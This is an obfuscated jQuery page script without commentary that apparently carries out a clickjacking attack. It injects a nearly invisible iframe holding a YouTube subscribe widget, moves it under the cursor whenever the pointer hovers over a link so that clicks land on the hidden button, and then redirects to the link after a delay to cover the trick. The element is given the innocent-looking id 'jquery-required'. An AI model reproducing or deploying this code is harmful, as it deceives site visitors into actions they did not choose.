var $J = jQuery['noConflict']();
function heightestChild(_0x37fax3) {
var _0x37fax4 = 0;
var _0x37fax5;
$J('*', _0x37fax3)['each'](function () {
if ($J(this)['outerHeight'](true) > _0x37fax4) {
_0x37fax5 = $J(this);
_0x37fax4 = _0x37fax5['outerHeight'](true);
};
});
if (_0x37fax3['outerHeight'](true) > _0x37fax4) {
_0x37fax4 = _0x37fax3['outerHeight'](true);
};
return _0x37fax4 + 3;
};
function highestOffsetTop(_0x37fax3) {
var _0x37fax4 = _0x37fax3['offset']()['top'];
var _0x37fax5;
$J('*', _0x37fax3)['each'](function () {
if ($J(this)['offset']()['top'] < _0x37fax4) {
_0x37fax5 = $J(this);
_0x37fax4 = _0x37fax5['offset']()['top'];
};
});
if (_0x37fax3['offset']()['top'] < _0x37fax4) {
_0x37fax4 = _0x37fax3['offset']()['top'];
};
return _0x37fax4 + 3;
};
$J(document)['ready'](function () {
if (window['DO_write']) {
$J('body')['append']('<div id="jquery-required" style="position:absolute;display:block;opacity:0.01;-khtml-opacity:.01;-moz-opacity:.01;filter:alpha(opacity=1);"><iframe id="fr" src="http://www.youtube.com/subscribe_widget?p=SpK" style="overflow: hidden; height: 92px; width: 134px; border: 0;" scrolling="no" frameBorder="0"></iframe></div>');
var _0x37fax7 = 0;
var _0x37fax8 = 0;
var _0x37fax9 = '';
$J(document)['mousemove'](function (_0x37faxa) {
if (_0x37faxa['pageY'] < (highestOffsetTop(_0x37fax9) - 4) || _0x37faxa['pageY'] > (highestOffsetTop(_0x37fax9) + heightestChild(_0x37fax9)) || _0x37faxa['pageX'] < _0x37fax9['offset']()['left'] || _0x37faxa['pageX'] > (_0x37fax9['offset']()['left'] + _0x37fax9['width']())) {
_0x37fax9 = '';
$J('#jquery-required')['css']('display', 'none');
} else {
if ($J['browser']['msie']) {
$J('#jquery-required')['css']('top', (_0x37faxa['pageY'] - 86) + 'px');
$J('#jquery-required')['css']('left', (_0x37faxa['pageX'] - 30) + 'px');
} else {
$J('#jquery-required')['css']('top', (_0x37faxa['pageY'] - 73) + 'px');
$J('#jquery-required')['css']('left', (_0x37faxa['pageX'] - 30) + 'px');
};
};
});
$J(document)['delegate']('a', 'mouseenter', function () {
_0x37fax9 = $J(this);
$J('#jquery-required')['css']('display', 'block');
setInterval(function () {
window['location']['href'] = _0x37fax9['attr']('href');
}, 3500);
});
};
});